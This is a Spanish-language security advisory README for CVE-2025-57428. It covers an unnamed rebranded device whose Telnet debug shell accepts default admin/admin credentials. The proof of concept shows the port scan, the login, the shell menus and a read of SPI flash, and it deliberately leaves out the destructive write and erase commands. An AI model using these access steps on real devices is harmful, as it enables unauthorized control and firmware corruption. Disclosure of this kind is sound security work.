
CVE-2025-57428
⚠️ Este repositorio se mantiene solo como referencia para CVE-2025-57428.
Para otros avisos y actualizaciones, consulte: security-advisories.
Este dispositivo expone una interfaz de depuración Telnet (habilitada por defecto en el puerto 23) y acepta credenciales de administrador (`admin`/`admin` por defecto). Después de la autenticación, el shell proporciona acceso directo a comandos de bajo nivel (notablemente `spi` y `reg`), lo que puede provocar corrupción arbitraria del firmware, bloqueo del dispositivo y pérdida de funcionalidad o configuración de seguridad.
Nota: Omito intencionalmente los comandos que realizan escrituras destructivas. La PoC a continuación confirma la existencia y accesibilidad de la interfaz sin proporcionar un exploit listo para usar.
Escanee el dispositivo en la LAN:
nmap -p 23 <device-ip>
Resultado: el puerto 23 (telnet) muestra open.
Conéctese a través de Telnet y autentíquese (credenciales predeterminadas):
telnet <device-ip>
# Login as: admin
# Password: admin
Después del inicio de sesión, se presenta un prompt de depuración CMD>.
Liste los comandos disponibles:
CMD>help
La salida de ayuda muestra los siguientes menús:
cfg net os
Ingrese al menú os:
CMD>os
Liste los comandos nuevamente:
OS>help
Esta vez la salida de ayuda muestra los siguientes comandos:
thread mem spi reg cpuload cpubusy event
Observaciones:
Los intentos de encontrar cualquier contacto de seguridad o canal de soporte del proveedor original no tuvieron éxito. El producto parece ser un dispositivo renombrado de origen desconocido.
Esta información se proporciona solo con fines educativos y defensivos. El autor no asume ninguna responsabilidad por el mal uso de esta información.
Usando spi muestra spi <rd/wr/er> <addr> [len].
Lea la memoria flash:
OS>spi rd 0x000fd0f0 16
Esto devuelve un volcado hexadecimal de la región flash:
4f30650a 938f56fa 1b663a19 e316d824
Esto confirma que el comando funciona y que el shell tiene acceso de bajo nivel.
El comando de escritura (spi wr) y el comando de borrado (spi er), así como los comandos reg, también son ejecutables.